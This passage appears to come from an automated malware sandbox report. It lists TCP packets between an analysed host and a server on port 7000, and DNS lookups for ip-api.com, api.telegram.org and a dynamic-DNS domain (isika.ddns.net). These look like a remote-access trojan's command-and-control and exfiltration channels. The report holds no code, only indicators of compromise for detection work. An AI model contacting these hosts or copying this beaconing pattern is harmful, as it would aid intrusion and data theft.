                                                    Oct 6, 2024 16:46:29.629132032 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.633941889 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.644776106 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.649581909 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.770066023 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.774889946 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.879599094 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.884402990 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.910541058 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.916834116 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.925714016 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.930478096 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.972771883 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.977688074 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:29.988358021 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:29.993097067 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.003992081 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.009017944 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.019534111 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.024291992 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.035038948 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.041352987 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.050759077 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.055607080 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.082268000 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.087524891 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.097779989 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.102663040 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.128998995 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.133804083 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.144511938 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.149312973 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.160002947 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.164812088 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.175694942 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.180584908 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.191428900 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.196325064 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.222836971 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.227823019 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.253936052 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.258898973 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.269449949 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.274504900 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.300736904 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.305664062 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.347754955 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.352605104 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.363219976 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.368335962 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.394372940 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.399255991 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.410228968 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.415254116 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:30.427090883 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:30.432174921 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.535526037 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.541023016 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.550961971 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.555963993 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.566426992 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.571592093 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.582071066 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.586884975 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.597631931 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.602603912 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.613430023 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.618329048 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.645018101 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.649890900 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.660279989 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.665195942 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.676147938 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.681071997 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.691766024 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.696892023 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.707453966 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.712428093 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.754869938 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.759962082 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.786252022 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.791423082 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.879231930 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.884679079 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.894768000 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.900414944 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.910243034 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.915419102 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.926331997 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.931312084 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.941912889 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.946862936 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.957513094 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.962342024 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:31.988929033 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:31.993838072 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:32.035321951 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:32.040303946 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:32.129532099 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:32.134479046 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:32.363344908 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:32.368205070 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:32.411540985 CEST496217000192.168.2.745.88.91.147
Oct 6, 2024 16:46:32.416538000 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.504067898 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.508929968 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.550941944 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.555771112 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.597882032 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.602811098 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.628988981 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.633846045 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.644941092 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.650165081 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.660254002 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.665096045 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.707393885 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.712764978 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.801009893 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.805836916 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.847696066 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.852495909 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.863301992 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.868252993 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.878834009 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:33.884071112 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:33.925976038 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:34.127327919 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:34.127394915 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:34.347904921 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:34.348026991 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:34.352881908 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:34.410151005 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:34.414978981 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:34.456993103 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:34.461786032 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:34.488171101 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:34.493279934 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:34.773312092 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:34.778239965 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.191541910 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.198278904 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.566880941 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.572072983 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.582456112 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.587923050 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.598033905 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.602879047 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.738504887 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.743307114 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.785689116 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.790823936 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.800925016 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.806324959 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.848009109 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.853224993 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.894834995 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.899683952 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:35.926346064 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:35.931200027 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.051032066 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.055953026 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.066482067 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.071976900 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.081967115 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.086850882 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.097682953 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.102529049 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.113398075 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.118288994 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.160140991 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.165033102 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.175769091 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.180594921 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.191397905 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.196727037 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.207097054 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.211878061 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.238387108 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.243870974 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.253966093 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.258832932 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.285167933 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.290443897 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.347768068 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.353710890 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.363285065 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.368191004 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.394509077 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.399302006 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:36.441457033 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:36.446258068 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:37.613728046 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:37.619216919 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:37.660486937 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:37.665255070 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:37.707164049 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:37.711911917 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:37.769716978 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:37.774477959 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:37.816534996 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:37.821968079 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:37.879290104 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:37.884057999 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:37.894757986 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:37.899975061 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:37.941641092 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:37.946598053 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.519505978 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.524497032 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.566495895 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.571620941 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.582407951 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.587272882 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.644656897 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.649692059 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.660167933 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.664992094 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.675900936 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.680869102 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.691401958 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.696346998 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.738279104 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.743417025 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.753982067 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.758984089 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.832151890 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.837197065 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.847681999 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.852646112 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.863414049 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.868359089 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.941365004 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.946540117 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.957005978 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.963712931 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:39.988591909 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:39.994080067 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:40.003912926 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:40.009494066 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:40.050754070 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:40.055938005 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:40.097980022 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:40.103027105 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:40.113347054 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:40.118176937 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:40.191622972 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:40.196621895 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:40.222711086 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:40.227699995 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:40.269767046 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:40.274879932 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:46.341461897 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:46.341594934 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:58.962460041 CEST | 49621 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:58.967073917 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 6, 2024 16:46:58.967300892 CEST | 7000 | 49621 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:58.969265938 CEST | 49633 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:58.974062920 CEST | 7000 | 49633 | 45.88.91.147 | 192.168.2.7
Oct 6, 2024 16:46:58.977440119 CEST | 49633 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:59.269320965 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 6, 2024 16:46:59.812827110 CEST | 49633 | 7000 | 192.168.2.7 | 45.88.91.147
Oct 6, 2024 16:46:59.878684998 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 6, 2024 16:47:01.081866026 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 6, 2024 16:47:03.488094091 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 6, 2024 16:47:08.300654888 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 6, 2024 16:45:08.390705109 CEST | 50600 | 53 | 192.168.2.7 | 1.1.1.1
Oct 6, 2024 16:45:08.397561073 CEST | 53 | 50600 | 1.1.1.1 | 192.168.2.7
Oct 6, 2024 16:45:10.863224983 CEST | 58417 | 53 | 192.168.2.7 | 1.1.1.1
Oct 6, 2024 16:45:10.870364904 CEST | 53 | 58417 | 1.1.1.1 | 192.168.2.7
Oct 6, 2024 16:45:12.090074062 CEST | 58975 | 53 | 192.168.2.7 | 1.1.1.1
Oct 6, 2024 16:45:12.099929094 CEST | 53 | 58975 | 1.1.1.1 | 192.168.2.7
Oct 6, 2024 16:45:35.088737011 CEST | 53 | 57273 | 162.159.36.2 | 192.168.2.7
Oct 6, 2024 16:45:35.589329958 CEST | 49164 | 53 | 192.168.2.7 | 1.1.1.1
Oct 6, 2024 16:45:35.596916914 CEST | 53 | 49164 | 1.1.1.1 | 192.168.2.7
Oct 6, 2024 16:45:37.329031944 CEST | 54549 | 53 | 192.168.2.7 | 1.1.1.1
Oct 6, 2024 16:45:37.336631060 CEST | 53 | 54549 | 1.1.1.1 | 192.168.2.7
Oct 6, 2024 16:46:00.020689011 CEST | 61202 | 53 | 192.168.2.7 | 1.1.1.1
Oct 6, 2024 16:46:00.029333115 CEST | 53 | 61202 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 6, 2024 16:45:08.390705109 CEST | 192.168.2.7 | 1.1.1.1 | 0x2bd1 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Oct 6, 2024 16:45:10.863224983 CEST | 192.168.2.7 | 1.1.1.1 | 0x8ee | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 6, 2024 16:45:12.090074062 CEST | 192.168.2.7 | 1.1.1.1 | 0xa937 | Standard query (0) | isika.ddns.net | A (IP address) | IN (0x0001) | false
Oct 6, 2024 16:45:35.589329958 CEST | 192.168.2.7 | 1.1.1.1 | 0x66aa | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 6, 2024 16:45:37.329031944 CEST | 192.168.2.7 | 1.1.1.1 | 0x3a79 | Standard query (0) | 50.23.12.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 6, 2024 16:46:00.020689011 CEST | 192.168.2.7 | 1.1.1.1 | 0xafa7 | Standard query (0) | isika.ddns.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 6, 2024 16:45:08.397561073 CEST | 1.1.1.1 | 192.168.2.7 | 0x2bd1 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Oct 6, 2024 16:45:10.870364904 CEST | 1.1.1.1 | 192.168.2.7 | 0x8ee | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 6, 2024 16:45:12.099929094 CEST | 1.1.1.1 | 192.168.2.7 | 0xa937 | No error (0) | isika.ddns.net | | 45.88.91.147 | A (IP address) | IN (0x0001) | false
Oct 6, 2024 16:45:35.596916914 CEST | 1.1.1.1 | 192.168.2.7 | 0x66aa | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
